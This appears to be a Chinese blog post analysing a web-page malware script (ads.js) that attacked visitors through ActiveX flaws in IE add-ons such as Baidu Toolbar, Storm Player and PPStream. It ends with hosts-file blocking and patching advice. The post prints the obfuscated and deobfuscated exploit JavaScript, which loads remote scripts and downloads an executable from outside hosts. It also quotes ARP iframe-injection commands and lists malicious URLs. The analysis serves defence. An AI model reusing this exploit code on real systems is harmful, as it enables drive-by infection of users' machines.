『u.asdafdgfgf.com/ads.js分析,临时解决办法』百度怎么啦,还是我怎么啦,还是…

不清楚是不是百度出问题啦,总之打开其他网页都是正常的现在,就是百度打开显示不了,要刷新(重试)几遍才会出来,再刷新就又没啦,不知道是不是我的机子有问题(现在没发现可疑情况啊!)还是我处的网络有问题(至少局域网中现在就我一人在线!)!

为啦方便我就直接把图片这样插入啦,需要的话就点开看吧,不需要就直接下文。

假象就是假象,qq使用的最多,现在局域网中也并不是我一人在线,因为在此查看攻击记录最后一次攻击的时间是23:55而我访问百度的时间也大概是这个时间,现在是当前时间:  0:08:43.92 。可惜他不能利用我的漏洞。

下边看看这个漏洞利用js代码:

eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+c+’\\b’,’g’),k[c])}}return p}(’18(7.41.57(\’43\’)==-1){23{8 38;8 39=(7.56(“10”));39.55(“54″,”58:53-59-64-63-62”);8 61=39.65(“49.46″,””)}20(38){};27{8 32=22 44();32.45(32.52()+24*60*60*51);7.41=\’43=50;47=/;32=\’+32.48();7.14(“<16 25=9://11.12.13/6.26><\\/16>”);18(38!=”[10 15]”){7.14(“<16 25=9://11.12.13/1.26><\\/16>”)}82{23{8 36;8 81=22 30(“80.79″)}20(36){};27{18(36!=”[10 15]”){7.14(“<16 25=9://11.12.13/2.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 37;8 83=22 30(“84.85.1″)}20(37){};27{18(37!=”[10 15]”){7.14(“<16 25=9://11.12.13/3.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 35;8 77=22 30(“78.70″)}20(35){};27{18(35!=”[10 15]”){7.14(“<16 25=9://11.12.13/4.26><\\/16>”);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}23{8 33;8 66=22 30(“69.68.1″)}20(33){};27{18(33!=”[10 15]”){7.14(“<42 21=67:71 25=9://11.12.13/5.26></42>”)}}23{8 34;8 40=22 30(“72.76″)}20(34){};27{18(34!=”[10 15]”){40.75(“9://11.12.13/19/19.74″,”19.73”,0);7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}18(36==”[10 15]”&&37==”[10 15]”&&35==”[10 15]”&&33==”[10 15]”&&34==”[10 15]”){7.14(“<17 21=\\”28: 31(\’9://11.12.13/19.29\’)\\”></17>”)}}}}’,10,86,’|||||||document|var|http|object|k|222360|com|write|Error|script|DIV|if|ads|catch|style|new|try||src|gif|finally|CURSOR|c|ActiveXObject|url|expires|i|j|h|f|g|e|ado|obj|cookie|iframe|OKSUN|Date|setTime|Stream|path|toGMTString|Adodb|SUN|1000|getTime|BD96C556|classid|setAttribute|createElement|indexOf|clsid|65A3||as|00C04FC29E36|983A|11D0|createobject|yahoo|display|GLChatCtrl|GLCHAT|Vod|none|BaiduBar|exe|cab|DloadDS|Tool|thunder|DPClient|StormPlayer|MPS|storm|else|pps|POWERPLAYER|PowerPlayerCtrl’.split(‘|’)))

这个一句太长啦哈,“加密”的很好厄,把eval替换为document.write偶只能看到一部分解密的代码:

// –>

// –>if(document.cookie.indexOf(‘OKSUN’)==-1){try{var e;var

ado=(document.createElement(“object”));

ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″);var

as=ado.createobject(“Adodb.Stream”,””)}catch(e){};finally{var expires=new

Date();expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie=’OKSUN=SUN;path=/;expires=’+expires.toGMTString();document.write(”

很好很强大的代码!利用的漏洞多为第三方程序(聊天工具,工具条,下载工具,多媒体播放程序)漏洞:

|yahoo|display|GLChatCtrl|GLCHAT|Vod|none|BaiduBar|exe|cab|DloadDS|Tool|thunder|DPClien

t|StormPlayer|MPS|storm|else|pps|POWERPLAYER|PowerPlayerCtrl’

下载地址应该在|k|222360|com这里,所以host过滤的时候也不要忘记搞掉这个k.222360.com下载的文件不光是exe文件还有cab类型的插件。所以建议开启杀软的实时监控或者开启网页漏洞利用功能(比如卡卡和360的网页防漏功能,还是微点好用呢!!)最好把这个域名加入“受限制站点”然后设定安全级别为高。

目前没有病毒样本(因为不是我中病毒啦),没有虚拟机也不好去让他中上搞到个样本!!似乎这个漏洞利用代码还没有完成的很好,因为只看到利用百度工具条(百度超级搜霸5.4(Version of “BaiduBar.dll” is 2.0.2.144))的漏洞,

其他的三个,暴风影音,PPS,迅雷,雅虎通的漏洞利用代码都去掉啦,只是输出document.write(“”),

也就是除啦利用百度搜霸的外其他的漏洞都没作用?。

http://k.222360.com/ads/ads.cab病毒文件,下载后的名字是ads.exe?

具体临时解决办法:

host过滤吧

127.0.0.1       asdafdgfgf.com

127.0.0.1       222360.com

127.0.0.1       u.asdafdgfgf.com/ads.js

127.0.0.1       k.222360.com

127.0.0.1       k.222360.com/ads/ads.cab

还有不放心的话可以把这个域名加进受限网址,和360的黑名单网站,来做进一步过滤。

释然,不是百度出问题啦,而是偶所在网络出问题啦,至少他现在拦截百度的页面拦截QQ相关的页面,

拦截木屑游戏(天龙八部的公告,问道的公告)的页面,其他的还没发现。

另外这个挂马代码也不是什么新东西啦,只是被“加密(使用正则表达式)”后拿出来罢啦,挂马代码:

function init(){document.write();} window.onload = init; if(document.cookie.indexOf(‘OK’)==-1){ try{var e; var ado=(document.createElement(“object”)); ado.setAttribute(“classid”,”clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″); var as=ado.createobject(“Adodb.Stream”,””)} catch(e){}; finally{ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie=’ce=windowsxp;path=/;expires=’+expires.toGMTString(); if(e!=”[object Error]”){ document.write(“<script src=http:\/\/aXXa.18XXdXXd.net\/aa\/1.js><\/script>”)} else{ try{var f;var storm=new ActiveXObject(“MPS.StormPlayer”);} catch(f){}; finally{if(f!=”[object Error]”){ document.write(“<script src=http://xxxxxxxxxx/2.js><\/script>”)}} try{var g;var pps=new ActiveXObject(“POWERPLAYER.PowerPlayerCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ document.write(“<script src=http:/:xxxxxxxxxx/3.js><\/script>”)}} try{var h;var obj=new ActiveXObject(“BaiduBar.Tool”);} catch(h){}; finally{if(h!=”[object Error]”){ obj.DloadDS(“http:/:xxxxxxxxxx/xx.exe”, “bd.exe”, 0)}} }}}

这个通用的,exp的的js调用就不同啦。

Registration Service Provided By: eNom, Inc.
Contact: etpreseller@gmail.com
Visit: www.enom.com

Domain name: asdafdgfgf.com

Registrant Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Administrative Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Technical Contact:
Zhang san
Zhang San (net1363@126.com)
+86.7505588888
Fax: +86.7505580000
Fujian province,Xiamen City
Xiamen, Hongkong 100000
CN

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 15 Dec 2007 17:44:40
Expiration date: 15 Dec 2008 17:44:40

说的很乱,主要就是从发现——>解密代码——>分析代码——>临时解决办法——>查看这个挂马代码的本来面目这样一个过程。

机器狗跟下载者木马的区别

1:感染所有.EXE (采用独特的感染方式,100%不破坏原文件!2分钟可以遍历硬盘感染5万个.EXE。不占内存和CPU!),中招之后没什么多大的感觉。
2:内网+外网扫描传播.基于Ipc$弱口令.自动获取本机内网Ip和外网Ip.
3:Arp挂马!最新的挂马方式.劫持网卡.让所有内网的机器访问任何一个网站(80端口),就强行给对方浏览的网页代码里加上挂马代码.这并不影响正常访问网站!中了机器狗之后,发现c:\windows\system32下有一个run.bat的文件。
Vml.exe –idx 0 ip 192.168.0.1-192.168.0.254 –prot 80 –insert <iframe src=” http://xxxxxxxxxxxxxxx.exiao.com/2.htm” width=20 height=1></iframe>
Vml.exe –idx 0 ip 192.168.1.1-192.168.1.254 –prot 80 –insert <iframe src=” http://xxxxxxxxxxxxxxx.exiao.com/2.htm” width=20 height=1></iframe>
这明显是ms06-014、ms07-017、PPStream、暴风影音等组合漏洞挂得木马。

被al.99.vc使用js挂马解决办法

al.99.vc挂马分析与解决建议

修改系统盘:C:\WINDOWS\system32\drivers\etc\host(用记事本打开)文件添加这句可以临时解决再次中这个站的木马病毒

127.0.0.1 al.99.vc

屏蔽这个网站就可以啦

。。。

http://w18.vg/real.gif貌似感染real,如果你有realone建议卸掉或者去官方下载最新的版本装上。如果你看到realone不是有错误提示说明你的realone有漏洞。

http://w18.vg/ms.gif这个貌似只有ie7才会被中上。所以建议你打上最新的ie补丁。

http://w18.vg/baidu.gif百度搜霸的漏洞利用,建议直接卸掉就可以啦。或者升级你的搜霸。
http://w18.vg/x1.gif这个已经为404页啦不清楚是什么

http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具

http://w18.vg/bf.gif暴风影音的漏洞利用,建议去下载新的暴风影音

如果个人机子建议打开病毒实时检测功能。

如果你有更好的建议,谢谢分享。